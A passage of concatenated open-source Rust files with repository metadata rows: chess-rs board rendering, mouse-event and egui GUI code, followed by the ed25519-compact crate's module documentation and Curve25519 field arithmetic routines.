            let tree = self.get_glyph_tree(&p);
            let glyph_t = tiny_skia::Transform::from_translate(
                i as f32 * check_side + glyph_width as f32 / 8.0,
                glyph_width as f32 / 8.0,
            );
            let fit = usvg::FitTo::Width(glyph_width);
            resvg::render(&tree, fit, glyph_t, pm.as_mut());
        }
        pixmap.draw_pixmap(
            0,
            0,
            pm.as_ref(),
            &tiny_skia::PixmapPaint::default(),
            t,
            None,
        );
    }
    /// Lay out and rasterize `s` at `px` pixels, centred in the overlay
    /// rectangle, then composite it into `pixmap` at transform `t`.
    fn draw_text(
        &mut self,
        s: &str,
        px: f32,
        t: tiny_skia::Transform,
        pixmap: &mut tiny_skia::Pixmap,
    ) {
        let mut pm =
            tiny_skia::Pixmap::new(self.overlay_xywh.2 as u32, self.overlay_xywh.3 as u32).unwrap();
        // pm.fill(tiny_skia::Color::WHITE);
        let mut layout = Layout::new(CoordinateSystem::PositiveYDown);
        layout.reset(&LayoutSettings {
            x: 0.0,
            y: 0.0,
            max_width: Some(self.overlay_xywh.2),
            max_height: Some(self.overlay_xywh.3),
            horizontal_align: HorizontalAlign::Center,
            ..LayoutSettings::default()
        });
        layout.append(&[&self.font], &TextStyle::new(s, px, 0));
        for glyph in layout.glyphs() {
            let (_, bitmap) = self.font.rasterize_indexed(glyph.key.glyph_index, px);
            // Coverage byte becomes the alpha channel of a black pixel.
            let mut bitmap: Vec<u8> = bitmap
                .into_iter()
                .map(|x| vec![0, 0, 0, x])
                .flatten()
                .collect();
            if glyph.char_data.is_whitespace() {
                continue;
            }
            let x = tiny_skia::PixmapMut::from_bytes(
                &mut bitmap,
                glyph.width as u32,
                glyph.height as u32,
            )
            .unwrap()
            .to_owned();
            pm.draw_pixmap(
                glyph.x as i32,
                glyph.y as i32,
                x.as_ref(),
                &tiny_skia::PixmapPaint::default(),
                tiny_skia::Transform::identity(),
                None,
            );
        }
        pixmap.draw_pixmap(
            0,
            0,
            pm.as_ref(),
            &tiny_skia::PixmapPaint::default(),
            t,
            None,
        );
    }
    /// Rasterize a single ruler character (memoized in `raster_cache`) and
    /// composite it into `pixmap` at transform `t`.
    fn draw_char(
        &mut self,
        c: char,
        px: f32,
        t: tiny_skia::Transform,
        pixmap: &mut tiny_skia::Pixmap,
    ) {
        let pm = {
            match self.raster_cache.get(&c.to_string()) {
                Some(x) => x,
                None => {
                    log::info!("Rasterizing {}", c);
                    let (metrics, bitmap) = self.font.rasterize(c, px);
                    // Coverage byte replicated into all four RGBA channels.
                    let mut p: Vec<u8> = bitmap
                        .into_iter()
                        .map(|x| vec![x, x, x, x])
                        .flatten()
                        .collect();
                    let x = tiny_skia::PixmapMut::from_bytes(
                        &mut p,
                        metrics.width as u32,
                        metrics.height as u32,
                    )
                    .unwrap()
                    .to_owned();
                    self.raster_cache.put(&c.to_string(), &x);
                    x
                }
            }
        };
        pixmap.draw_pixmap(
            0,
            0,
            pm.as_ref(),
            &tiny_skia::PixmapPaint::default(),
            t,
            None,
        );
    }
}
| rust | MIT | 6916b36b2a0ef29864a140207c52588b3d201799 | 2026-01-04T20:21:38.332169Z | false |
ParthPant/chess-rs | https://github.com/ParthPant/chess-rs/blob/6916b36b2a0ef29864a140207c52588b3d201799/chrs/src/board/events.rs | chrs/src/board/events.rs | pub use winit::event::{ElementState, MouseButton};
/// Input events forwarded from the window to the board widget.
pub enum BoardEvent {
    /// Cursor moved; `position` is in board-pixel coordinates.
    CursorMoved {
        position: (usize, usize),
    },
    /// A mouse button changed state.
    MouseInput {
        state: ElementState,
        button: MouseButton,
    },
    /// The cursor left the drawing area.
    CursorLeft,
}
/// Mouse button and cursor state accumulated across window events.
#[derive(Debug, Default)]
pub struct MouseState {
    is_left_pressed: bool,
    is_right_pressed: bool,
    // Whether the cursor is currently inside the drawing area.
    is_cursor_in: bool,
    // Last known cursor position in board pixels.
    pos: (usize, usize),
    // Displacement between the last two recorded positions.
    delta: (i16, i16),
}
impl MouseState {
    /// Record a new cursor position and the displacement from the old one.
    pub fn update_pos(&mut self, p: (usize, usize)) {
        let (new_x, new_y) = p;
        let (old_x, old_y) = self.pos;
        self.delta = (new_x as i16 - old_x as i16, new_y as i16 - old_y as i16);
        self.pos = p;
    }
    /// Whether the left button is currently held down.
    pub fn get_is_left_pressed(&self) -> bool {
        self.is_left_pressed
    }
    /// Whether the right button is currently held down.
    pub fn get_is_right_pressed(&self) -> bool {
        self.is_right_pressed
    }
    /// Whether the cursor is currently inside the drawing area.
    pub fn get_is_cursor_in(&self) -> bool {
        self.is_cursor_in
    }
    /// Last recorded cursor position in board pixels.
    pub fn get_pos(&self) -> (usize, usize) {
        self.pos
    }
    /// Displacement between the last two recorded positions.
    pub fn get_delta(&self) -> (i16, i16) {
        self.delta
    }
    pub fn set_left_pressed(&mut self) {
        self.is_left_pressed = true;
    }
    pub fn set_left_released(&mut self) {
        self.is_left_pressed = false;
    }
    pub fn set_right_pressed(&mut self) {
        self.is_right_pressed = true;
    }
    pub fn set_right_released(&mut self) {
        self.is_right_pressed = false;
    }
    pub fn unset_cursor_in(&mut self) {
        self.is_cursor_in = false;
    }
    pub fn set_cursor_in(&mut self) {
        self.is_cursor_in = true;
    }
}
| rust | MIT | 6916b36b2a0ef29864a140207c52588b3d201799 | 2026-01-04T20:21:38.332169Z | false |
ParthPant/chess-rs | https://github.com/ParthPant/chess-rs/blob/6916b36b2a0ef29864a140207c52588b3d201799/chrs/src/ui/gui.rs | chrs/src/ui/gui.rs | use std::cell::RefCell;
use std::rc::Rc;
use chrs_lib::ai::NegaMaxAI;
use chrs_lib::data::BoardConfig;
use chrs_lib::data::Color;
use egui::Slider;
use egui::{Color32, Context};
/// State backing the egui overlay (menu panel, about window, FEN editor).
pub struct Gui {
    // Text currently entered in the "Load Fen" box.
    fen: String,
    // NOTE(review): initialized to "p" but not read anywhere in this view —
    // confirm whether it is still used before removing.
    bit_board: String,
    // Visibility toggles for the side menu and the About window.
    show_menu: bool,
    show_about: bool,
}
impl Gui {
    /// Create a `Gui` with the menu open and the About window closed.
    pub fn new() -> Self {
        Self {
            fen: "".to_string(),
            bit_board: "p".to_string(),
            show_menu: true,
            show_about: false,
        }
    }
    /// Create the UI using egui: top menu bar, recent-moves strip, About
    /// window, and the side panel (game controls, FEN import/export, AI
    /// tuning and stats).
    pub fn ui(&mut self, ctx: &Context, config: &mut BoardConfig, ai: &mut NegaMaxAI) {
        // Top bar: theme switch plus toggles for the menu and About windows.
        egui::TopBottomPanel::top("top_panel").show(ctx, |ui| {
            ui.visuals_mut().button_frame = false;
            ui.horizontal(|ui| {
                egui::widgets::global_dark_light_mode_switch(ui);
                ui.separator();
                ui.toggle_value(&mut self.show_menu, "☰ Menu");
                ui.separator();
                ui.toggle_value(&mut self.show_about, "ℹ About");
            });
        });
        // Bottom bar: up to the last five moves, newest first.
        egui::TopBottomPanel::bottom("bottom_panel").show(ctx, |ui| {
            ui.visuals_mut().button_frame = false;
            ui.horizontal(|ui| {
                if config.move_history.counter > 0 {
                    ui.label("Recent Moves: ");
                    let end = config.move_history.counter;
                    let start = end.saturating_sub(5);
                    let mut alpha = 0xff;
                    for i in (start..end).rev() {
                        let color = ui.style().visuals.text_color();
                        ui.label(
                            egui::RichText::new(format!(
                                "{}",
                                config.move_history.list[i as usize].unwrap()
                            ))
                            .color(
                                egui::Color32::from_rgba_unmultiplied(
                                    color.r(),
                                    color.g(),
                                    color.b(),
                                    alpha,
                                ),
                            ),
                        );
                        // Older moves fade out via decreasing alpha.
                        alpha = alpha.saturating_sub(50);
                        if i != start {
                            ui.separator();
                        }
                    }
                } else {
                    ui.label("No moves yet");
                }
            });
        });
        egui::Window::new("ℹ About")
            .open(&mut self.show_about)
            .show(ctx, |ui| {
                ui.vertical_centered_justified(|ui| {
                    ui.strong("chess-rs");
                    ui.strong(format!("v{}", env!("CARGO_PKG_VERSION")));
                    ui.label("A Chess Engine written in Rust that runs natively and on the web!");
                    ui.strong("⚖ MIT license");
                    ui.strong("Author: Parth Pant");
                    ui.strong("Email: parthpant4@gmail.com");
                    use egui::special_emojis::{GITHUB, TWITTER};
                    ui.hyperlink_to(
                        format!("{} chess-rs on GitHub", GITHUB),
                        "https://github.com/ParthPant/chess-rs",
                    );
                    ui.hyperlink_to(
                        format!("{} @PantParth", TWITTER),
                        "https://twitter.com/PantParth",
                    );
                });
            });
        egui::SidePanel::left("left_Panel")
            .frame(egui::Frame::central_panel(&ctx.style()).inner_margin(5.))
            .show_animated(ctx, self.show_menu, |ui| {
                ui.strong("chess-rs");
                ui.heading("In Play");
                ui.label({
                    match config.get_active_color() {
                        Color::White => "White",
                        Color::Black => "Black",
                    }
                });
                ui.separator();
                ui.horizontal(|ui| {
                    if ui.button("Reset").clicked() {
                        config.reset();
                    }
                    if ui.button("Undo").clicked() {
                        // NOTE(review): undo is called twice — presumably to
                        // revert both the player's move and the AI's reply;
                        // confirm.
                        config.undo();
                        config.undo();
                    }
                });
                ui.separator();
                ui.heading("Board Configuration");
                egui::CollapsingHeader::new("FEN").show(ui, |ui| {
                    ui.label(egui::RichText::new(config.get_fen()).size(10.0).monospace());
                    // Clipboard button: copies the current FEN.
                    if ui
                        .add(egui::Label::new("📋").sense(egui::Sense::click()))
                        .clicked()
                    {
                        ui.output_mut(|o| o.copied_text = config.get_fen());
                    }
                    ui.add(egui::TextEdit::multiline(&mut self.fen));
                    if ui.button("Load Fen").clicked() {
                        config.load_fen(&self.fen);
                    }
                });
                ui.separator();
                ui.heading("AI");
                ui.add(Slider::new(&mut ai.depth, 2..=8).text("Search Depth"));
                ui.add(Slider::new(&mut ai.quiescence_depth, 2..=8).text("Quiescence Depth"));
                ui.separator();
                ui.label(format!("Nodes Searched: {}", ai.stats.node_count));
                ui.label(format!("Max Depth: {}", ai.stats.max_depth));
                ui.label(format!("Time Taken: {:?}", ai.stats.time));
            });
    }
}
| rust | MIT | 6916b36b2a0ef29864a140207c52588b3d201799 | 2026-01-04T20:21:38.332169Z | false |
ParthPant/chess-rs | https://github.com/ParthPant/chess-rs/blob/6916b36b2a0ef29864a140207c52588b3d201799/chrs/src/ui/mod.rs | chrs/src/ui/mod.rs | /* Shamelessly Copied from examples/minimal-egui in `Pixels` repo!
* Link: https://github.com/parasyte/pixels/blob/main/examples/minimal-egui/src/gui.rs
*/
mod gui;
use chrs_lib::ai::NegaMaxAI;
use chrs_lib::data::BoardConfig;
use egui::{ClippedPrimitive, Context, TexturesDelta};
use egui_wgpu::renderer::{Renderer, ScreenDescriptor};
use gui::Gui;
use pixels::{wgpu, PixelsContext};
use std::cell::RefCell;
use std::rc::Rc;
use winit::event_loop::EventLoopWindowTarget;
use winit::window::Window;
/// Manages all state required for rendering egui over `Pixels`.
pub struct GuiFramework {
    // State for egui.
    egui_ctx: Context,
    // Winit <-> egui input/output bridge.
    egui_state: egui_winit::State,
    // Physical size and scale factor of the render surface.
    screen_descriptor: ScreenDescriptor,
    // wgpu-backed egui renderer.
    renderer: Renderer,
    // Tessellated shapes from the last `prepare()` call, consumed by `render()`.
    paint_jobs: Vec<ClippedPrimitive>,
    // Pending texture uploads/frees; applied and drained during `render()`.
    textures: TexturesDelta,
    // State for the GUI
    gui: Gui,
}
impl GuiFramework {
    /// Creates the egui context, winit state, and wgpu renderer for a
    /// surface of `width` x `height` physical pixels at `scale_factor`.
    pub fn new<T>(
        event_loop: &EventLoopWindowTarget<T>,
        width: u32,
        height: u32,
        scale_factor: f32,
        pixels: &pixels::Pixels,
    ) -> Self {
        let max_texture_size = pixels.device().limits().max_texture_dimension_2d as usize;
        let egui_ctx = Context::default();
        let mut egui_state = egui_winit::State::new(event_loop);
        egui_state.set_max_texture_side(max_texture_size);
        egui_state.set_pixels_per_point(scale_factor);
        let screen_descriptor = ScreenDescriptor {
            size_in_pixels: [width, height],
            pixels_per_point: scale_factor,
        };
        let device = pixels.device();
        let tex_format = pixels.render_texture_format();
        // 1 = MSAA sample count; None = no depth/stencil attachment.
        let renderer = Renderer::new(device, tex_format, None, 1);
        let textures = TexturesDelta::default();
        let gui = Gui::new();
        Self {
            egui_ctx,
            egui_state,
            screen_descriptor,
            renderer,
            paint_jobs: Vec::new(),
            textures,
            gui,
        }
    }
    /// Forwards a window event to egui; returns `true` when egui consumed
    /// it (so the caller should not also handle it as game input).
    pub fn handle_event(&mut self, event: &winit::event::WindowEvent) -> bool {
        self.egui_state.on_event(&self.egui_ctx, event).consumed
    }
    /// Resize egui. Zero-sized dimensions (e.g. minimized window) are ignored.
    pub fn resize(&mut self, width: u32, height: u32) {
        if width > 0 && height > 0 {
            self.screen_descriptor.size_in_pixels = [width, height];
        }
    }
    /// Update scaling factor (e.g. after a DPI change).
    pub fn scale_factor(&mut self, scale_factor: f64) {
        self.screen_descriptor.pixels_per_point = scale_factor as f32;
    }
    /// Runs one egui frame and tessellates its output into `paint_jobs`,
    /// ready for `render()`.
    pub fn prepare(&mut self, window: &Window, config: &mut BoardConfig, ai: &mut NegaMaxAI) {
        // Run the egui frame and create all paint jobs to prepare for rendering.
        let raw_input = self.egui_state.take_egui_input(window);
        let output = self.egui_ctx.run(raw_input, |egui_ctx| {
            // Draw the chess GUI.
            self.gui.ui(egui_ctx, config, ai);
        });
        self.textures.append(output.textures_delta);
        self.egui_state
            .handle_platform_output(window, &self.egui_ctx, output.platform_output);
        self.paint_jobs = self.egui_ctx.tessellate(output.shapes);
    }
    /// Uploads pending egui textures/buffers and records a render pass that
    /// draws the last prepared frame on top of `render_target`.
    pub fn render(
        &mut self,
        encoder: &mut wgpu::CommandEncoder,
        render_target: &wgpu::TextureView,
        context: &PixelsContext,
    ) {
        // Upload all resources to the GPU.
        for (id, image_delta) in &self.textures.set {
            self.renderer
                .update_texture(&context.device, &context.queue, *id, image_delta);
        }
        self.renderer.update_buffers(
            &context.device,
            &context.queue,
            encoder,
            &self.paint_jobs,
            &self.screen_descriptor,
        );
        // Render egui with WGPU
        {
            // LoadOp::Load keeps the pixel buffer contents underneath the UI.
            let mut rpass = encoder.begin_render_pass(&wgpu::RenderPassDescriptor {
                label: Some("egui"),
                color_attachments: &[Some(wgpu::RenderPassColorAttachment {
                    view: render_target,
                    resolve_target: None,
                    ops: wgpu::Operations {
                        load: wgpu::LoadOp::Load,
                        store: true,
                    },
                })],
                depth_stencil_attachment: None,
            });
            self.renderer
                .render(&mut rpass, &self.paint_jobs, &self.screen_descriptor);
        }
        // Cleanup: free textures egui no longer needs, reset the delta.
        let textures = std::mem::take(&mut self.textures);
        for id in &textures.free {
            self.renderer.free_texture(id);
        }
    }
}
| rust | MIT | 6916b36b2a0ef29864a140207c52588b3d201799 | 2026-01-04T20:21:38.332169Z | false |
jedisct1/rust-ed25519-compact | https://github.com/jedisct1/rust-ed25519-compact/blob/661a45223bece49b3ad8da33fe0f3a408ea895c1/src/lib.rs | src/lib.rs | //! A compact Ed25519 and X25519 implementation for Rust.
//!
//! * Formally-verified Curve25519 field arithmetic
//! * `no_std`-friendly
//! * WebAssembly-friendly
//! * Fastly Compute-friendly
//! * Lightweight
//! * Zero dependencies if randomness is provided by the application
//! * Only one portable dependency (`getrandom`) if not
//! * Supports incremental signatures (streaming API)
//! * Safe and simple Rust interface.
//!
//! Example usage:
//!
//! ```rust
//! # #[cfg(feature = "random")] {
//! use ed25519_compact::*;
//!
//! // A message to sign and verify.
//! let message = b"test";
//!
//! // Generates a new key pair using a random seed.
//! // A given seed will always produce the same key pair.
//! let key_pair = KeyPair::from_seed(Seed::generate());
//!
//! // Computes a signature for this message using the secret part of the key pair.
//! let signature = key_pair.sk.sign(message, Some(Noise::generate()));
//!
//! // Verifies the signature using the public part of the key pair.
//! key_pair
//! .pk
//! .verify(message, &signature)
//! .expect("Signature didn't verify");
//!
//! // Verification of a different message using the same signature and public key fails.
//! key_pair
//! .pk
//! .verify(b"A different message", &signature)
//! .expect_err("Signature shouldn't verify");
//!
//! // All these structures can be viewed as raw bytes simply by dereferencing them:
//! let signature_as_bytes: &[u8] = signature.as_ref();
//! println!("Signature as bytes: {:?}", signature_as_bytes);
//! # }
//! ```
//!
//! ## Incremental API example usage
//!
//! Messages can also be supplied as multiple parts (streaming API) in order to
//! handle large messages without using much memory:
//!
//! ```rust
//! # #[cfg(feature = "random")] {
//! use ed25519_compact::*;
//!
//! /// Creates a new key pair.
//! let kp = KeyPair::generate();
//!
//! /// Create a state for an incremental signer.
//! let mut st = kp.sk.sign_incremental(Noise::default());
//!
//! /// Feed the message as any number of chunks, and sign the concatenation.
//! st.absorb("mes");
//! st.absorb("sage");
//! let signature = st.sign();
//!
//! /// Create a state for an incremental verifier.
//! let mut st = kp.pk.verify_incremental(&signature).unwrap();
//!
//! /// Feed the message as any number of chunks, and verify the concatenation.
//! st.absorb("mess");
//! st.absorb("age");
//! assert!(st.verify().is_ok());
//! # }
//! ```
//!
//! Cargo features:
//!
//! * `self-verify`: after having computed a new signature, verify that is it
//! valid. This is slower, but improves resilience against fault attacks. It
//! is enabled by default on WebAssembly targets.
//! * `std`: disables `no_std` compatibility in order to make errors implement
//! the standard `Error` trait.
//! * `random` (enabled by default): adds `Default` and `generate`
//! implementations to the `Seed` and `Noise` objects, in order to securely
//! create random keys and noise.
//! * `traits`: add support for the traits from the ed25519 and signature
//! crates.
//! * `pem`: add support for importing/exporting keys as OpenSSL-compatible PEM
//! files.
//! * `blind-keys`: add support for key blinding.
//! * `opt_size`: Enable size optimizations (based on benchmarks, 8-15% size
//! reduction at the cost of 6.5-7% performance).
//! * `x25519`: Enable support for the X25519 key exchange system.
//! * `disable-signatures`: Disable support for signatures, and only compile
//! support for X25519.
#![cfg_attr(not(feature = "std"), no_std)]
#![allow(
clippy::needless_range_loop,
clippy::many_single_char_names,
clippy::unreadable_literal,
clippy::let_and_return,
clippy::needless_lifetimes,
clippy::cast_lossless,
clippy::suspicious_arithmetic_impl,
clippy::identity_op
)]
mod common;
mod error;
mod field25519;
mod sha512;
pub use crate::common::*;
pub use crate::error::*;
#[cfg(not(feature = "disable-signatures"))]
mod ed25519;
#[cfg(not(feature = "disable-signatures"))]
mod edwards25519;
#[cfg(not(feature = "disable-signatures"))]
pub use crate::ed25519::*;
#[cfg(feature = "x25519")]
pub mod x25519;
#[cfg(not(feature = "disable-signatures"))]
#[cfg(feature = "pem")]
mod pem;
| rust | MIT | 661a45223bece49b3ad8da33fe0f3a408ea895c1 | 2026-01-04T20:21:43.974864Z | false |
jedisct1/rust-ed25519-compact | https://github.com/jedisct1/rust-ed25519-compact/blob/661a45223bece49b3ad8da33fe0f3a408ea895c1/src/field25519.rs | src/field25519.rs | #![allow(unused_parens)]
#![allow(non_camel_case_types)]
use core::cmp::{Eq, PartialEq};
use core::ops::{Add, Mul, Sub};
use crate::error::*;
// fiat-crypto style helper aliases: a 1-bit carry/borrow flag and small
// signed intermediates, all stored in 8-bit machine types.
pub type fiat_25519_u1 = u8;
pub type fiat_25519_i1 = i8;
pub type fiat_25519_i2 = i8;
#[cfg_attr(feature = "opt_size", inline(never))]
#[cfg_attr(not(feature = "opt_size"), inline)]
pub fn fiat_25519_addcarryx_u51(
out1: &mut u64,
out2: &mut fiat_25519_u1,
arg1: fiat_25519_u1,
arg2: u64,
arg3: u64,
) {
let x1: u64 = (((arg1 as u64).wrapping_add(arg2)).wrapping_add(arg3));
let x2: u64 = (x1 & 0x7ffffffffffff);
let x3: fiat_25519_u1 = ((x1 >> 51) as fiat_25519_u1);
*out1 = x2;
*out2 = x3;
}
#[cfg_attr(feature = "opt_size", inline(never))]
#[cfg_attr(not(feature = "opt_size"), inline)]
pub fn fiat_25519_subborrowx_u51(
out1: &mut u64,
out2: &mut fiat_25519_u1,
arg1: fiat_25519_u1,
arg2: u64,
arg3: u64,
) {
let x1: i64 = ((((((arg2 as i128).wrapping_sub((arg1 as i128))) as i64) as i128)
.wrapping_sub((arg3 as i128))) as i64);
let x2: fiat_25519_i1 = ((x1 >> 51) as fiat_25519_i1);
let x3: u64 = (((x1 as i128) & 0x7ffffffffffff_i128) as u64);
*out1 = x3;
*out2 = ((0x0_i8.wrapping_sub((x2 as fiat_25519_i2))) as fiat_25519_u1);
}
#[cfg_attr(feature = "opt_size", inline(never))]
#[cfg_attr(not(feature = "opt_size"), inline)]
pub fn fiat_25519_cmovznz_u64(out1: &mut u64, arg1: fiat_25519_u1, arg2: u64, arg3: u64) {
let x1: fiat_25519_u1 = (!(!arg1));
let x2: u64 = (((((0x0_i8.wrapping_sub((x1 as fiat_25519_i2))) as fiat_25519_i1) as i128)
& 0xffffffffffffffff_i128) as u64);
let x3: u64 = ((x2 & arg3) | ((!x2) & arg2));
*out1 = x3;
}
#[cfg_attr(feature = "opt_size", inline(never))]
#[cfg_attr(not(feature = "opt_size"), inline)]
/// Field multiplication with reduction: `out1 = arg1 * arg2` over five
/// 51-bit limbs. The `0x13` (= 19) factors fold high partial products back
/// down using 2^255 ≡ 19 (mod p). Machine-generated fiat-crypto style code —
/// do not hand-edit.
pub fn fiat_25519_carry_mul(out1: &mut [u64; 5], arg1: &[u64; 5], arg2: &[u64; 5]) {
    // Schoolbook partial products; those crossing the 2^255 boundary are
    // pre-multiplied by 19.
    let x1: u128 = (((arg1[4]) as u128).wrapping_mul((((arg2[4]).wrapping_mul(0x13)) as u128)));
    let x2: u128 = (((arg1[4]) as u128).wrapping_mul((((arg2[3]).wrapping_mul(0x13)) as u128)));
    let x3: u128 = (((arg1[4]) as u128).wrapping_mul((((arg2[2]).wrapping_mul(0x13)) as u128)));
    let x4: u128 = (((arg1[4]) as u128).wrapping_mul((((arg2[1]).wrapping_mul(0x13)) as u128)));
    let x5: u128 = (((arg1[3]) as u128).wrapping_mul((((arg2[4]).wrapping_mul(0x13)) as u128)));
    let x6: u128 = (((arg1[3]) as u128).wrapping_mul((((arg2[3]).wrapping_mul(0x13)) as u128)));
    let x7: u128 = (((arg1[3]) as u128).wrapping_mul((((arg2[2]).wrapping_mul(0x13)) as u128)));
    let x8: u128 = (((arg1[2]) as u128).wrapping_mul((((arg2[4]).wrapping_mul(0x13)) as u128)));
    let x9: u128 = (((arg1[2]) as u128).wrapping_mul((((arg2[3]).wrapping_mul(0x13)) as u128)));
    let x10: u128 = (((arg1[1]) as u128).wrapping_mul((((arg2[4]).wrapping_mul(0x13)) as u128)));
    let x11: u128 = (((arg1[4]) as u128).wrapping_mul(((arg2[0]) as u128)));
    let x12: u128 = (((arg1[3]) as u128).wrapping_mul(((arg2[1]) as u128)));
    let x13: u128 = (((arg1[3]) as u128).wrapping_mul(((arg2[0]) as u128)));
    let x14: u128 = (((arg1[2]) as u128).wrapping_mul(((arg2[2]) as u128)));
    let x15: u128 = (((arg1[2]) as u128).wrapping_mul(((arg2[1]) as u128)));
    let x16: u128 = (((arg1[2]) as u128).wrapping_mul(((arg2[0]) as u128)));
    let x17: u128 = (((arg1[1]) as u128).wrapping_mul(((arg2[3]) as u128)));
    let x18: u128 = (((arg1[1]) as u128).wrapping_mul(((arg2[2]) as u128)));
    let x19: u128 = (((arg1[1]) as u128).wrapping_mul(((arg2[1]) as u128)));
    let x20: u128 = (((arg1[1]) as u128).wrapping_mul(((arg2[0]) as u128)));
    let x21: u128 = (((arg1[0]) as u128).wrapping_mul(((arg2[4]) as u128)));
    let x22: u128 = (((arg1[0]) as u128).wrapping_mul(((arg2[3]) as u128)));
    let x23: u128 = (((arg1[0]) as u128).wrapping_mul(((arg2[2]) as u128)));
    let x24: u128 = (((arg1[0]) as u128).wrapping_mul(((arg2[1]) as u128)));
    let x25: u128 = (((arg1[0]) as u128).wrapping_mul(((arg2[0]) as u128)));
    // Column sums, then a carry chain from limb 0 upward.
    let x26: u128 =
        (x25.wrapping_add((x10.wrapping_add((x9.wrapping_add((x7.wrapping_add(x4))))))));
    let x27: u64 = ((x26 >> 51) as u64);
    let x28: u64 = ((x26 & 0x7ffffffffffff_u128) as u64);
    let x29: u128 =
        (x21.wrapping_add((x17.wrapping_add((x14.wrapping_add((x12.wrapping_add(x11))))))));
    let x30: u128 =
        (x22.wrapping_add((x18.wrapping_add((x15.wrapping_add((x13.wrapping_add(x1))))))));
    let x31: u128 =
        (x23.wrapping_add((x19.wrapping_add((x16.wrapping_add((x5.wrapping_add(x2))))))));
    let x32: u128 =
        (x24.wrapping_add((x20.wrapping_add((x8.wrapping_add((x6.wrapping_add(x3))))))));
    let x33: u128 = ((x27 as u128).wrapping_add(x32));
    let x34: u64 = ((x33 >> 51) as u64);
    let x35: u64 = ((x33 & 0x7ffffffffffff_u128) as u64);
    let x36: u128 = ((x34 as u128).wrapping_add(x31));
    let x37: u64 = ((x36 >> 51) as u64);
    let x38: u64 = ((x36 & 0x7ffffffffffff_u128) as u64);
    let x39: u128 = ((x37 as u128).wrapping_add(x30));
    let x40: u64 = ((x39 >> 51) as u64);
    let x41: u64 = ((x39 & 0x7ffffffffffff_u128) as u64);
    let x42: u128 = ((x40 as u128).wrapping_add(x29));
    let x43: u64 = ((x42 >> 51) as u64);
    let x44: u64 = ((x42 & 0x7ffffffffffff_u128) as u64);
    // Fold the final carry back into limb 0 (times 19) and propagate once more.
    let x45: u64 = (x43.wrapping_mul(0x13));
    let x46: u64 = (x28.wrapping_add(x45));
    let x47: u64 = (x46 >> 51);
    let x48: u64 = (x46 & 0x7ffffffffffff);
    let x49: u64 = (x47.wrapping_add(x35));
    let x50: fiat_25519_u1 = ((x49 >> 51) as fiat_25519_u1);
    let x51: u64 = (x49 & 0x7ffffffffffff);
    let x52: u64 = ((x50 as u64).wrapping_add(x38));
    out1[0] = x48;
    out1[1] = x51;
    out1[2] = x52;
    out1[3] = x41;
    out1[4] = x44;
}
#[cfg_attr(feature = "opt_size", inline(never))]
#[cfg_attr(not(feature = "opt_size"), inline)]
/// Field squaring with reduction: `out1 = arg1 * arg1` over five 51-bit
/// limbs. Exploits symmetry (each cross product counted once, doubled) and
/// folds overflow with 2^255 ≡ 19 (mod p). Machine-generated fiat-crypto
/// style code — do not hand-edit.
pub fn fiat_25519_carry_square(out1: &mut [u64; 5], arg1: &[u64; 5]) {
    // Pre-scaled copies of the high limbs (by 19 and/or 2).
    let x1: u64 = ((arg1[4]).wrapping_mul(0x13));
    let x2: u64 = (x1.wrapping_mul(0x2));
    let x3: u64 = ((arg1[4]).wrapping_mul(0x2));
    let x4: u64 = ((arg1[3]).wrapping_mul(0x13));
    let x5: u64 = (x4.wrapping_mul(0x2));
    let x6: u64 = ((arg1[3]).wrapping_mul(0x2));
    let x7: u64 = ((arg1[2]).wrapping_mul(0x2));
    let x8: u64 = ((arg1[1]).wrapping_mul(0x2));
    let x9: u128 = (((arg1[4]) as u128).wrapping_mul((x1 as u128)));
    let x10: u128 = (((arg1[3]) as u128).wrapping_mul((x2 as u128)));
    let x11: u128 = (((arg1[3]) as u128).wrapping_mul((x4 as u128)));
    let x12: u128 = (((arg1[2]) as u128).wrapping_mul((x2 as u128)));
    let x13: u128 = (((arg1[2]) as u128).wrapping_mul((x5 as u128)));
    let x14: u128 = (((arg1[2]) as u128).wrapping_mul(((arg1[2]) as u128)));
    let x15: u128 = (((arg1[1]) as u128).wrapping_mul((x2 as u128)));
    let x16: u128 = (((arg1[1]) as u128).wrapping_mul((x6 as u128)));
    let x17: u128 = (((arg1[1]) as u128).wrapping_mul((x7 as u128)));
    let x18: u128 = (((arg1[1]) as u128).wrapping_mul(((arg1[1]) as u128)));
    let x19: u128 = (((arg1[0]) as u128).wrapping_mul((x3 as u128)));
    let x20: u128 = (((arg1[0]) as u128).wrapping_mul((x6 as u128)));
    let x21: u128 = (((arg1[0]) as u128).wrapping_mul((x7 as u128)));
    let x22: u128 = (((arg1[0]) as u128).wrapping_mul((x8 as u128)));
    let x23: u128 = (((arg1[0]) as u128).wrapping_mul(((arg1[0]) as u128)));
    // Column sums and carry chain, as in `fiat_25519_carry_mul`.
    let x24: u128 = (x23.wrapping_add((x15.wrapping_add(x13))));
    let x25: u64 = ((x24 >> 51) as u64);
    let x26: u64 = ((x24 & 0x7ffffffffffff_u128) as u64);
    let x27: u128 = (x19.wrapping_add((x16.wrapping_add(x14))));
    let x28: u128 = (x20.wrapping_add((x17.wrapping_add(x9))));
    let x29: u128 = (x21.wrapping_add((x18.wrapping_add(x10))));
    let x30: u128 = (x22.wrapping_add((x12.wrapping_add(x11))));
    let x31: u128 = ((x25 as u128).wrapping_add(x30));
    let x32: u64 = ((x31 >> 51) as u64);
    let x33: u64 = ((x31 & 0x7ffffffffffff_u128) as u64);
    let x34: u128 = ((x32 as u128).wrapping_add(x29));
    let x35: u64 = ((x34 >> 51) as u64);
    let x36: u64 = ((x34 & 0x7ffffffffffff_u128) as u64);
    let x37: u128 = ((x35 as u128).wrapping_add(x28));
    let x38: u64 = ((x37 >> 51) as u64);
    let x39: u64 = ((x37 & 0x7ffffffffffff_u128) as u64);
    let x40: u128 = ((x38 as u128).wrapping_add(x27));
    let x41: u64 = ((x40 >> 51) as u64);
    let x42: u64 = ((x40 & 0x7ffffffffffff_u128) as u64);
    let x43: u64 = (x41.wrapping_mul(0x13));
    let x44: u64 = (x26.wrapping_add(x43));
    let x45: u64 = (x44 >> 51);
    let x46: u64 = (x44 & 0x7ffffffffffff);
    let x47: u64 = (x45.wrapping_add(x33));
    let x48: fiat_25519_u1 = ((x47 >> 51) as fiat_25519_u1);
    let x49: u64 = (x47 & 0x7ffffffffffff);
    let x50: u64 = ((x48 as u64).wrapping_add(x36));
    out1[0] = x46;
    out1[1] = x49;
    out1[2] = x50;
    out1[3] = x39;
    out1[4] = x42;
}
#[cfg_attr(feature = "opt_size", inline(never))]
#[cfg_attr(not(feature = "opt_size"), inline)]
/// Carries a loosely-packed element so every limb fits in 51 bits.
/// The overflow out of the top limb is folded back into limb 0 multiplied
